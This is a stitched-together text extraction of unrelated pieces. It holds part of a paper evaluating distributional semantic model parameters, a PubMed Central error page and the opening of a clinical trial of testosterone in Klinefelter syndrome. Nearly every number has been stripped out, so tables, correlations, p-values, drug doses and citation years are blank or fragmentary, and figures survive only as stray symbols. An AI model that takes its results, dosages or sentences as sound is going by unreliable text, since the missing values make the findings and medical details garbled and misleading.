are ranked according to the average fea- ture ablation r values across both datasets (adj. r of the full linear model: rg : %; ws : %). ● ● ● ● ● ● ● ● ● ● ●criterion win.direction context.dim dim.skip win.size red.dim rel.index metric transformation corpus score partial r ● rg ws figure : ratings, parameters and feature ablation table reports all interactions that explain more than . % of the total variance in both datasets. for reasons of space, we only discuss the interactions and best parameter values on rg ; the correspond- ing plots for ws are shown only if there are sub- stantial differences. as already noted for the toefl task, score and transformation have a large explanatory power and they are involved in a strong interaction showing the interaction df rg ws score:transf . . metric:red.dim . . score:metric . . win.size:transf . . corpus:metric . . metric:context.dim . . corpus:score . . win.size:score . . score:dim.skip . . table : ratings datasets: interactions, r same tendencies and optimal values already iden- tified for toefl. for reasons of space, we do not elaborate on this interaction here. the analysis of the main effects shows that for both datasets wackypedia is the best option as a source corpus, suggesting that this task bene- fits from a trade-off between quality and quan- tity (wackypedia being smaller and cleaner than ukwac, but less balanced than the bnc). index of distributional relatedness plays a much more important role than for the toefl task, with neighbor rank clearly outperforming distance (see figures and and the discussion in section . for more details). the choice of the optimal window size depends on transformation: on the rg dataset, figure shows that for a logarithmic transformation – which we al- ready identified as the best transformation in combi- nation with significance association measures – the highest performance is achieved with a word win- dow. the corresponding effect display for ws (figure ) suggests that a further small improvement may be obtained with an word window in this case. one possible explanation for this observation is the different composition of the ws dataset, which includes examples of semantic relatedness beyond attributional similarity. the word window is a ro- bust choice across both datasets, though. the number of latent dimensions is involved in a strong interaction with the distance metric (figure ). best results are achieved with the cosine met- ric and at least latent dimensions, as well as skipped dimensions. the interaction plot between metric and number of original dimensions in figure shows that context dimensions are suffi- cient for good performance, and no further improve- ment can be expected from even higher-dimensional spaces. ● ● ● ● ● . . . . . . . transformation ● none log root sigmoid figure : rg , window size / transformation ● ● ● ● ● . . . . . . . transformation ● none log root sigmoid figure : ws , window size / transformation ● ● ● ● ● . . . . . . . metric ● cosine manhattan figure : rg , metric / n. latent dim. ● ● ● ● ● . . . . . . . metric ● cosine manhattan figure : rg , metric / n. context dimensions best settings for both datasets are summarized in table . refer to appendix a for best models. . clustering figure displays the importance of the evaluated parameters in the clustering task (adj. r of the full linear model: ap: %; battig: %; esslli: %; mitchell: %). parameter ranking is de- termined by the average of the feature ablation r values over all four datasets. ● ● ● ● ● ● ● ● ● ● ●criterion win.direction rel.index context.dim dim.skip red.dim win.size metric corpus transformation score partial r ● ap battig esslli mitchell figure : clustering, parameters and feat. ablation interaction df ap battig esslli mitchell score:transf . . . . metric:red.dim . . . . win.size:metric . . . . win.size:transf . . . . corpus:metric . . . . metric:dim.skip . . . . corpus:win.size . . . . score:dim.skip . . . . win.size:score . . . . table : clustering task: interactions, r table reports all parameter interactions that ex- plain more than . % of the total variance for each of the four datasets. in the following discussion, we focus on the ap dataset, which is larger and thus more reliable than the other three datasets. we mention remarkable dif- ferences between the datasets in terms of best pa- rameter values. for a full overview of the best pa- rameter setting for each dataset, see table . as already discussed for toefl and the ratings task, we find score and transformation at the top of the feature ablation ranking. table confirms that the two parameters are involved in a strong inter- action. the interaction plot (figure ) shows the behavior we are already familiar with: significance ● ● ● ● ● ● ● . . . . frequency tf.idf mi dice simple−ll t−score z−score transformation ● none log root sigmoid figure : ap, score / transformation ● ● ● ● ● . . . . metric ● cosine manhattan figure : ap, window size / metric ● ● ● ● ● . . . . corpus ● bnc wacky ukwac figure : ap, corpus / window size ● ● ● . . . . metric ● cosine manhattan figure : ap, metric / n. of skipped dim. measures (simple-ll, t-score and z-score) reach the best performance in combination with log transfor- mation: this combination is a robust choice also for the other datasets, with minor differences that can be observed in table . the interaction between window size and metric is displayed in figure : best performance is achieved with a or word window in combination with co- sine distance. results on the other datasets suggest a preference for the word window. this is confirmed by interaction plots with source corpus (figure ), which also reveal that wackypedia is again the best compromise between size and quality. a very clear picture concerning the number of skipped dimensions emerges from figure and is the same for all datasets: skipping dimensions is not necessary to achieve good performance (even though skipping dimensions turned out at least to be not detrimental for battig and mitchell). further effect displays, not shown here for rea- sons of space, suggest that or latent dimen- sions – with some variation across the datasets (cf. table ) – and a medium-sized co-occurrence matrix ( or dimensions) are needed to achieve good performance. neighbor rank is the best choice as index of distributional relatedness (see section . ). see appendix a for best models. . relatedness index a novel contribution of our work is the systematic evaluation of a parameter that has received little at- tention in dsm research so far, and only in studies limited to a narrow choice of datasets (lapesa and evert, ; lapesa et al., ; zeller et al., ): the index of distributional relatedness. the aim of this section is to provide a full overview of the impact of this parameter in our ex- periments. despite the main focus of the paper on the reduced setting, in this section we also show re- sults from the unreduced setting, for two reasons: first, since this parameter is relatively novel and evaluated here for the first time on standard tasks, we consider it necessary to provide a full picture concerning its behavior; second, relatedness index turned out to be much more influential in the unre- duced setting than in the reduced one. figure and display the partial effect of relat- edness index for each dataset, in the unreduced and reduced setting respectively. to allow for a com- parison between the different measures of perfor- ● ●● ● ● ● ● toefl rg ws ap battig mitchell esslli rel.index ● dist rank figure : unreduced setting ● ● ● ● ● ● ● toefl rg ws ap battig mitchell esslli rel.index ● dist rank figure : reduced setting mance, correlation and purity values have been con- verted to percentages. the picture emerging from the two plots is very clear: neighbor rank is the best choice for both settings across all seven datasets. the degree of improvement over vector distance, however, shows considerable variation between dif- ferent datasets. the rating task benefits the most from the use of neighbor rank. on the other hand, neighbor rank has very lit- tle effect for the toefl task in a reduced setting, where its high computational complexity is clearly not justified; the improvement on the ap clustering dataset is also fairly small. while the toefl result seems to contradict the substantial improvement of neighbor rank found by lapesa and evert ( ) for a multiple-choice task based on stimuli from prim- ing experiments, there were only two choices (con- sistent and inconsistent prime) in this case rather than four. we do not rule out that a more refined use of the rank information (for example, different strategies for rank combinations) may produce bet- ter results on the toefl and ap datasets. as discussed in section . , we have not yet ex- plored the potential of neighbor rank in modeling directionality effects in semantic similarity. unlike lapesa and evert ( ), who adopt four differ- ent indexes of distributional relatedness (vector dis- tance; forward rank, i.e., rank of the target in the neighbors of the prime; backward rank, i.e, rank of the prime in the neighbors of the target; average of backward and forward rank), we used only a single rank-based index (cf. section . ), mostly for rea- sons of computational complexity. we consider the results of this study more than encouraging, and ex- pect further improvements from a full exploration of directionality effects in the tasks at issue. . best settings we conclude the result overview by evaluating the best parameter combinations identified for each task and data set, showing how well our approach to model selection works in practice. table summarizes the optimal parameter set- tings identified for each task and compares the per- formance of this model (b.set = best setting) with the over-trained best run in the experiment (b.run = best run). in most cases, the result of our ro- bust parameter optimization is close to the best run. the only exception is the esslli dataset, which is smaller than the other datasets and particularly sus- ceptible to over-training (cf. the low r of the re- gression analysis in section . ). table also re- ports the current state of the art for each task (soa = state-of-the-art), taken from the acl wiki where available (toefl and similarity ratings), from ba- roni and lenci ( ) for the clustering tasks, and from more recent studies of which we are aware. our results are comparable to the state of the art, even though the latter includes a much broader range of approaches than our window-based dsms. in one case (battig), our optimized model even improves on the best previous result. a side-by-side inspection of the main effects and interaction plots for different data sets allowed us to identify parameter settings that are robust across datasets and even across tasks. table shows rec- ommended settings for each task (independent of the abbreviations in the table: win = window size; c.dim = number of context dimensions; tr = transformation; red.dim = number of latent dimensions; d.sk= number of skipped dimen- sions; r.ind = relatedness index; parameter values: s-ll = simple- ll; t-sc = t-score; cos = cosine; man = manhattan. http://aclweb.org/aclwiki dataset corpus win c.dim score tr metric r.ind red.dim d.sk b.set b.run soa reference toefl ukwac k s-ll log cos rank . . . bullinaria and levy ( ) rg wacky k s-ll log cos rank . . . hassan and mihalcea ( ) ws wacky k s-ll log cos rank . . . halawi et al. ( ) ap wacky k s-ll log cos rank . . . rotenhäusler and schütze ( ) battig wacky k s-ll log cos rank . . . baroni and lenci ( ) esslli wacky k t-sc log cos rank . . . katrenko, esslli workshop mitchell wacky k s-ll log cos rank . . . bullinaria and levy ( ) common for all datasets: window direction = undirected; criterion for context selection = frequency table : best settings particular dataset) and a more general setting that achieves good performance in all three tasks. eval- uation results for these settings on each dataset are reported in table . in most cases, the general model is close to the performance of the task- and dataset- specific settings. our robust evaluation methodol- ogy has enabled us to find a good trade-off between portability and performance. task corpus win c.dim score tr metric r.ind red.dim d.sk toefl ukwac k s-ll log cos rank rating wacky k s-ll log cos rank clustering wacky k s-ll log cos rank general wacky k s-ll log cos rank table : general best settings dataset toefl ratings clustering general toefl . . . . rg . . . . ws . . . . ap . . . . battig . . . . esslli . . . . mitchell . . . . table : general best settings – performance conclusion in this paper, we reported the results of a large-scale evaluation of window-based distributional semantic models, involving a wide range of parameters and tasks. our model selection methodology is robust to overfitting and sensitive to parameter interactions. the acl wiki lists the hybrid model of yih and qazvinian ( ) as the best model on rg with ρ = . , but does not specify its pearson correlation r. in our comparison table, we show the best pearson correlation, achieved by hassan and mi- halcea ( ), which is also the best corpus-based model. halawi et al. ( ) report spearman’s ρ . the ρ values for our best setting are: rg : . , ws : . ; best setting for the ratings task: rg : . , ws : . ; best general setting: rg : . , ws : . . http://wordspace.collocations.de/ it allowed us to identify parameter configurations that perform well across different datasets within the same task, and even across different tasks. we rec- ommend the setting highlighted in bold font in table as a general-purpose dsm for future research. we believe that many applications of dsms (e.g. vector compositon) will benefit from using such a param- eter combination that achieves robust performance in a variety of semantic tasks. moreover, an exten- sive evaluation based on a robust methodology like the one presented here is the first necessary step for further comparisons of bag-of-words dsms to dif- ferent techniques for modeling word meaning, such as neural embeddings (mikolov et al., ). let us now summarize our main findings. • our experiments show that a cluster of three pa- rameters, namely score, transformation and dis- tance metric, plays a consistently crucial role in determining dsm performance. these param- eters also show a homogeneous behavior across tasks and datasets with respect to best parameter values: simple-ll, log transformation and cosine distance. these tendencies confirm the results in polajnar and clark ( ) and kiela and clark ( ). in particular, the finding that sparse as- sociation measures (with negative values clamped to zero) achieve the best performance can be con- nected to the positive impact of context selection highlighted by polajnar and clark ( ): ongo- ing work targets a more specific analysis of their “thinning” effect on distributional vectors. • another group of parameters (corpus, window size, dimensionality reduction parameters) is also influential in all tasks, but shows more variation wrt. the best parameter values. except for the toefl task, best results are obtained with the wackypedia corpus, confirming the observation of sridharan and murphy ( ) that corpus qual- ity compensates for size to some extent. window size and dimensionality reduction show a more task-specific behavior, even though it is possible to find a good compromise in a word window, a reduced space of dimensions and skipping of the first dimensions. the latter result confirms the findings of bullinaria and levy ( ; ) in their clustering experiments. • the number of context dimensions turned out to be less crucial. while very high-dimensional spaces usually result in better performance, the increase beyond or dimensions is rarely suf- ficient to justify the increased processing cost. • a novel contribution of our work is the systematic evaluation of a parameter that has been given lit- tle attention in dsm research so far: the index of distributional relatedness. our results show that, even if the parameter is not among the most in- fluential ones, neighbor rank consistently outper- forms distance. without svd dimensionality re- duction, the difference is more pronounced: this result is particularly interesting for composition- ality tasks, where svd has been reported to be detrimental (baroni and zamparelli, ). in such cases, the benefits of using neighbor rank clearly outweigh the increased (but manageable) computational complexity. ongoing work focuses on the extension of the eval- uation setting to further parameters (e.g., new dis- tance metrics and association scores, caron’s ( ) exponent p) and tasks (e.g., compositionality tasks, meaning in context), as well as the evaluation of dependency-based models. we are also working on a refined model selection methodology involv- ing a systematic analysis of three-way interactions and the exclusion of inferior parameter values (such as manhattan distance, sigmoid transformation and dice score), which may have a confounding effect on some of the effect displays. appendix a: best models this appendix reports the best runs for every dataset. some abbreviations are different from tables and . pa- rameters: w = window; dir = direction; e = exclusion criterion for context selection; m = metric. performance: acc = accu- racy; cor = correlation; pur = purity. parameter values: dir = directed; undir = undirected; f = frequency; nz = non-zero. corpus w dir e c.dim score tr m r.ind red.dim d.sk acc ukwac undir f mi none cos rank . ukwac dir f t-score log cos rank . ukwac undir f t-score root cos dist . ukwac dir f simple-ll log cos dist . table : toefl dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor ukwac undir nz mi none cos rank . ukwac dir f mi none cos rank . wacky dir nz simple-ll log cos rank . wacky undir f z-score log cos rank . table : ratings, rg dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor wacky dir f mi none man rank . wacky undir f mi none man rank . wacky undir f z-score log man rank . wacky dir f z-score root man rank . table : ratings, wordsim dataset – best model ( additional hand-picked models with sim- ilar performance are shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac dir nz t-score log man rank . wacky dir nz z-score log man rank . wacky undir f simple-ll log man rank . wacky dir f z-score log cos rank . table : clustering, almuhareb-poesio dataset – best model (plus additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac undir f dice root man rank . ukwac undir f freq log cos dist . wacky undir f z-score log man dist . wacky undir f dice root man rank . table : clustering, battig dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur wacky dir nz z-score none man dist . ukwac dir nz simple-ll log cos dist . ukwac undir f tf.idf none man dist . wacky undir f tf.idf root man rank . table : clustering, esslli dataset – best model (plus additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur bnc undir nz simple-ll log cos rank . bnc undir f simple-ll log cos rank . bnc undir nz simple-ll log cos rank . table : clustering, mitchell dataset – models tied for best result acknowledgments we are grateful to the editor and the anonymous re- viewers, whose comments helped us improve the paper. we would like to thank sabine schulte im walde and the semrel group at the ims stuttgart, the corpus linguistics group at the university of erlangen-nürnberg and the computational linguis- tics group at the ikw osnabrück for their feedback on our work. gabriella lapesa’s phd research was funded by the dfg collaborative research centre sfb at ims stuttgart, where she conducted a large part of the work presented in this paper. references abdulrahman almuhareb. . attributes in lexical acquisition. ph.d. thesis, university of essex. marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , mit, massachusetts, usa. marco baroni, raffaella bernardi, and roberto zampar- elli. . frege in space: a program for compo- sitional distributional semantics. linguistic issues in language technology (lilt), ( ): – . john a. bullinaria and joseph p. levy. . extract- ing semantic representations from word co-occurrence statistics: a computational study. behavior research methods, : – . john a. bullinaria and joseph p. levy. . extract- ing semantic representations from word co-occurrence statistics: stop-lists, stemming and svd. behavior research methods, : – . john a. bullinaria and joseph p. levy. . limiting factors for mapping corpus-based semantic represen- tations to brain activity. plos one, ( ): – . john caron. . experiments with lsa scoring: optimal rank and basis. in michael w. berry, edi- tor, computational information retrieval, pages – . society for industrial and applied mathematics, philadelphia, pa, usa. stefan evert. . corpora and collocations. in anke lüdeling and merja kytö, editors, corpus linguistics. an international handbook, chapter . mouton de gruyter, berlin, new york. stefan evert. . distributional semantics in r with the wordspace package. in proceedings of coling , the th international conference on compu- tational linguistics: system demonstrations, pages – , dublin, ireland. lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the concept revisited. acm transactions on information systems, ( ): – . john fox. . effect displays in r for generalised lin- ear models. journal of statistical software, ( ): – . guy halawi, gideon dror, evgeniy gabrilovich, and yehuda koren. . large-scale learning of word re- latedness with constraints. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , new york, ny, usa. nathan halko, per-gunnar martinsson, and joel a. tropp. . finding structure with randomness: stochastic algorithms for constructing approximate matrix decompositions. technical report - , acm, california institute of technology. mary hare, michael jones, caroline thomson, sarah kelly, and ken mcrae. . activating event knowl- edge. cognition, ( ): – . zelig harris. . distributional structure. word, ( ): – . samer hassan and rada mihalcea. . semantic relat- edness using salient semantic analysis. in proceedings of the twenty-fifth aaai conference on artificial intel- ligence, pages – , san francisco, california. george karypis. . cluto: a clustering toolkit (release . . ). technical report - , minneapo- lis: university of minnesota, department of computer science. leonard kaufman and peter j. rousseeuw. . find- ing groups in data: an introduction to cluster analysis. john wiley and sons. douwe kiela and stephen clark. . a systematic study of semantic vector space model parameters. in proceedings of eacl , workshop on continu- ous vector space models and their compositionality (cvsc), pages – , gothenburg, sweden. thomas k. landauer and susan t. dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of the acquisition, induction, and representation of knowledge. psychological review, : – . gabriella lapesa and stefan evert. . evaluating neighbor rank and distance measures as predictors of semantic priming. in proceedings of the acl work- shop on cognitive modeling and computational lin- guistics (cmcl ), pages – , sofia, bulgaria. gabriella lapesa, stefan evert, and sabine schulte im walde. . contrasting syntagmatic and paradig- matic relations: insights from distributional semantic models. in proceedings of the third joint confer- ence on lexical and computational semantics (*sem ), pages – , dublin, ireland. dekang lin. . automatic retrieval and clustering of similar words. in proceedings of the th annual meeting of the association for computational linguis- tics and th international conference on computa- tional linguistics - volume , pages – , mon- treal, quebec, canada. kevin lund and curt burgess. . producing high-dimensional semantic spaces from lexical co- occurrence. behavior research methods, instrumen- tation and computers, : – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. corr. jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – , columbus, ohio. tom mitchell, svetlana v. shinkareva, andrew carlson, kai-min chang, vicente l. malave, robert a. mason, and marcel adam just. . predicting human brain activity associated with the meanings of nouns. sci- ence, ( ): – . brian murphy, partha talukdar, and tom mitchell. . selecting corpus-semantic models for neurolinguistic decoding. in proceedings of the first joint conference on lexical and computational semantics - semeval ’ , pages – . sebastian padó and mirella lapata. . dependency- based construction of semantic space models. compu- tational linguistics, ( ): – . tamara polajnar and stephen clark. . improving distributional semantic vectors through context selec- tion and normalisation. in proceedings of the th conference of the european chapter of the asso- ciation for computational linguistics (eacl ), pages – , gothenburg, sweden. klaus rothenhäusler and hinrich schütze. . un- supervised classification with dependency based word spaces. in proceedings of the eacl workshop on gems: geometical models of natural language semantics, pages – , athens, greece. herbert rubenstein and john b. goodenough. . contextual correlates of synonymy. communications of the acm, ( ): — . magnus sahlgren. . the word-space model: us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. ph.d. thesis, university of stockolm. gerard salton, andrew wong, and chungshu yang. . a vector space model for automatic indexing. communications of the acm, ( ): – . hinrich schütze. . automatic word sense discrimi- nation. computational linguistics, ( ): – . seshadri sridharan and brian murphy. . model- ing word meaning: distributional semantics and the corpus quality-quantity trade-off. in proceedings of the rd workshop on cognitive aspects of the lexicon (cogalex-iii), pages – , mumbai, india. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . james van overschelde, katherine rawson, and john dunlosky. . category norms: an updated and expanded version of the battig and montague ( ) norms. journal of memory and language, : – . wen-tau yih and vahed qazvinian. . measur- ing word relatedness using heterogeneous vector space models. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies (naacl hlt ’ ), pages – , montreal, canada. britta zeller, sebastian padó, and jan šnajder. . to- wards semantic validation of a derivational lexicon. in proceedings of coling , the th international conference on computational linguistics: technical papers, pages – , dublin, ireland. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ : – c høst et al. testosterone in klinefelter syndrome research a placebo-controlled randomized study with testosterone in klinefelter syndrome: beneficial effects on body composition christian høst , , anders bojesen , mogens erlandsen , kristian a groth , kurt kristensen , anne grethe jurik , niels h birkebæk and claus h gravholt , department of endocrinology and internal medicine and the medical research laboratories, clinical institute, aarhus university hospital, aarhus n, denmark department of pediatrics, aarhus university hospital, aarhus n, denmark department of clinical genetics, aarhus university hospital, aarhus n, denmark section for biostatistics, department of public health, aarhus university, aarhus c, denmark department of molecular medicine, aarhus university hospital, aarhus n, denmark department of radiology, aarhus university hospital, aarhus n, denmark correspondence should be addressed to c h gravholt: ch.gravholt@dadlnet.dk abstract context and objective: males with klinefelter syndrome (ks) are typically hypogonadal with a high incidence of metabolic disease, increased body fat and mortality. testosterone treatment of hypogonadal patients decrease fat mass, increase lean body mass and improve insulin sensitivity, but whether this extends to patients with ks is presently unknown. research design and methods: in a randomized, double-blind, placebo-controlled, bmi- matched cross-over study, males with ks (age: . years; bmi: .  kg/m ) received testosterone (andriol®)  mg per day (testosterone) or placebo treatment for months. thirteen age- and bmi-matched healthy controls were recruited. dexa scan, abdominal computed tomography (ct) scan and a hyperinsulinemic–euglycemic clamp, muscle strength and maximal oxygen uptake measurement were performed. results: total lean body mass and body fat mass were comparable between testosterone- naïve ks and controls using dexa, whereas visceral fat mass, total abdominal and intra-abdominal fat by ct was increased (p <  . ). testosterone decreased total body fat (p =  . ) and abdominal fat by ct (p =  . ). glucose disposal was similar between testosterone-naïve ks and controls (p =  . ) and unchanged during testosterone (p =  . ). free fatty acid suppression during the clamp was impaired in ks and maximal oxygen uptake was markedly lower in ks, but both were unaffected by treatment. testosterone increased hemoglobin and igf-i. conclusion: testosterone treatment in adult males with ks for months leads to favorable changes in body composition with reductions in fat mass, including abdominal fat mass, but does not change measures of glucose homeostasis. introduction klinefelter syndrome (ks, ,xxy) is the most common sex chromosomal disorder with a prevalence of in men ( , ). classically, the ks phenotype is characterized by eunuch body proportions, increased height and hypergonadotropic hypogonadism ( ). the incidence of the metabolic syndrome and insulin resistance is considerably higher in patients with ks ( , ), and epidemiological studies show an increased mortality - - key words f klinefelter syndrome f testosterone f body composition f rare diseases/syndromes f insulin sensitivity id: - endocrine connections ( ) , – this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:ch.gravholt@dadlnet.dk https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : due to diabetes as well as diseases of the cardiovascular, respiratory and digestive systems ( ). the association between ks and diabetes was first reported in , with % of patients with ks having a diabetic oral glucose tolerance test ( ). others have described decreased insulin sensitivity, with increased fasting insulin levels ( ). at the same time cross-sectional studies have shown an inverse relationship between plasma testosterone and insulin resistance in normal males ( ). we previously found that the increased occurrence of insulin resistance and diabetic glucose tolerance testing among males with ks, translates into an increased frequency of type diabetes among patients with ks, which are often hypogonadal ( ). among normal males, hypogonadism is also more prevalent among patients with type diabetes than in age-matched controls ( ), which could indicate a bi-directional relationship between testosterone and diabetes. this effect is less pronounced ( ) or even absent ( , ) when one takes into account bmi or waist-to-hip ratio. this lack of an association between testosterone and diabetes, when adding bmi or the amount of body fat into the equation, begs the question whether the association between testosterone and type diabetes is through adiposity rather than testosterone itself, not forgetting the distinct genetic background present in ks with an additional x chromosome. it has been shown that treatment with testosterone in hypogonadal patients with type diabetes improves insulin sensitivity in obese patients ( ), but not in lean patients ( ). which point toward the fact that changes in insulin sensitivity during therapy largely depend on the amount of ‘modifiable fat’, especially visceral fat. studies on male hypogonadal patients of different etiologies have shown an increase in muscle mass and a decreased fat mass following -month testosterone treatment ( ) and that withdrawal of testosterone supplementation for just days lead to lower insulin sensitivity ( ). however, the genetic make-up of males with ks is unique and one study found that increased insulin resistance in ks was related to gene dosage of the csf ra gene located on both the x and y chromosome ( ). also higher leptin levels in ks compared with controls were not lowered after months of testosterone treatment ( ), and finally, it has been suggested that overproduction of ccl , a small chemokine expressed at sites of inflammation and associated with insulin resistance, could explain insulin resistance in ks ( ). recently, we found profound changes in the methylation and rna expression pattern throughout the genome among males with ks and enrichment analyses showed that the observed methylation changes was related to development of diabetes ( ). the present study is the first randomized placebo- controlled study to investigate the effects of testosterone treatment on insulin sensitivity, body composition, muscle strength and maximal oxygen uptake in patients with ks using gold standard methods. we hypothesized that testosterone treatment would improve insulin sensitivity and body composition. materials and methods subjects twenty males with ks were included in the study. men with ks were recruited from the outpatient clinic at the department of endocrinology and internal medicine at aarhus university hospital. inclusion criteria were age above years with verified ks karyotype. exclusion criteria were bmi above kg/m or below kg/m , diabetes, history of malignant disease, prostate-specific antigen above ng/ml, symptomatic heart disease, familial history of thromboembolic conditions, clinical hepatic disease (alanine aminotransferase more than four times above upper limit value), known allergic condition toward the medicine used in the project, heavy smoking (more than cigarettes a day), alcoholism (more than units of alcohol per week), severe mental illness or any other condition with a known influence on the investigated parameters. most males with ks had received testosterone treatment before entering the study, while a few were testosterone naïve at inclusion. during the study one was excluded due to a high serum testosterone. four withdrew their informed consent, and two withdrew their consent to participate due to side effects of the study medication, which was perceived to be normal effects of testosterone by the study investigators. thus the final study group consisted of patients (age: . ( – years); bmi: . ± . (kg/m )) with cytogenetically verified ks. the control group consisted of age- (age: . ( – ) years) and bmi-matched ( . ± . (kg/m )) healthy controls, which were recruited through advertisement on the internet. before study start, participants (ks and controls) were screened and a complete physical examination was performed. all volunteers received oral and written information prior to giving written, informed consent. the study was conducted from to . the protocol was approved by the region midt ethical scientific this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome : committee (# ) and performed in accordance with the helsinki declaration ii. study design the study was a -month randomized, double-blinded, placebo-controlled, cross-over study without a washout period (fig. ). randomization was performed in blocks of six in order to ensure equal numbers in each group, and by an independent body. study days consisted of two coupled days; day or ‘metabolic day’ and day , allocated for dexa estimation of body composition, ct measuring the amount of intra-abdominal (visceral) fat mass, a vo max test, muscle strength and -h ambulatory blood pressure measurement (ambp) (fig. ). the ks group was randomized to either testosterone in the form of andriol® (testosterone undecanoat) or placebo treatment and subsequently crossed over. the andriol® dose was mg/day divided in two doses of mg and participants were instructed to ingest the medicine with a fatty meal. compliance was measured by counting the remaining pills after every -month period. the control group did not receive any treatment and was examined once. the ks group was examined before and after each -month period. ks participants received their last tablet the evening before the examinations. three days before the study, volunteers were instructed not to participate in heavy physical exercise or to drink alcoholic beverages. after an overnight fast (> h) subjects were admitted to the clinical research unit and confined to bed. hyperinsulinemic euglycemic clamp at : h (t = − min) a catheter was placed into an antecubital vein for infusion of saline to maintain catheter patency. another catheter was inserted into a vein on the contralateral hand and kept in a thermo-regulated heating box ( °c) for sampling of arterialized venous blood. after collection of baseline blood samples, plasma was collected for metabolites at t = , , and min. at t = min, a -h infusion of human insulin (actrapid; novo nordisk a/s) commenced ( . mu/kg total body mass/min). plasma glucose was measured every min and clamped at mmol/l by a variable infusion of % glucose. the glucose infusion rate during the last hour of the clamp (m value) was used as an index of insulin sensitivity. insulin and metabolite concentrations were determined every min. respiratory exchange rates (rq) and total energy expenditure (ee) were calculated from indirect calorimetry (deltatrac; datex instrumentarium, helsinki, finland) and urea excretion. oxidation rates of screening inves�ga�ons testosterone treatment placebo treatment placebo treatment testosterone treatment inves�ga�ons blood samples indirect calorimetry - - day : hyperinsulinemic euglycemic clampinsulin mu/kg/min day : microdialysismeasurement of glucose, lactate and glycerol . dexa scan with determina�on of body composi�on . ct slice – intraabdominal fat . vo -max tes�ng . muscle strength determina�on . hour blood pressure measurement figure  outline of the study design and the two separate study days. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : glucose was calculated based on non-protein ee and rq ( ). indirect calorimetry was performed from t = − to t = min and from t = to t = min. at min, all catheters were removed and plasma glucose stabilized and the participants had lunch and were discharged. analytical techniques plasma glucose was analyzed in duplicate using the glucose oxidase method (beckman coulter). measurements were performed immediately during the study. insulin was measured with an immunoassay (dako). homa calculator was downloaded from https://www.dtu.ox.ac. uk/homacalculator/. plasma glucagon was measured by a ria ( ). testosterone, dheas, androstenedione and -hydroxy-progesterone were measured by liquid- chromatography tandem mass spectrometry. the limit of detection for testosterone was . nmol/l, and the working ranges were . – nmol/l. the working range was assessed from the precision profile, and defined as the concentration in which the coefficient of variation (cv) was < %. sex hormone-binding globulin, fsh and lh were analyzed on the architect i platform (abbott) by chemiluminescent micro particle immunoassay method using the corresponding kits. the working ranges were . – nmol/l, . – ie/l and . - ie/l, respectively. serum igf- was measured by noncompetitive tr-ifma and serum igfbp- was measured by an immunoradiometric assay (irma) (diagnostic system laboratories inc.). c-reactive protein (crp) was measured by a high-sensitive crp tr-ifma with a detection limit of . μg/l. plasma lipids and triglycerides were measured using an automated commercially available system (aeroset, abbott diagnostics, abbott park laboratories). the cv was < %. serum ffa was determined by a colorimetric method using a commercial kit (wako chemicals). body composition, maximal aerobic capacity and -h ambulatory blood pressure measurement body weight was measured on trial day before confinement to bed (with the participants wearing underwear) to the nearest . kg, height was measured to the nearest . cm at inclusion and bmi was calculated. on the following day we measured total and regional fat mass (g) and lean body mass (g) by dual x-ray densitometry (dexa) using a hologic /w 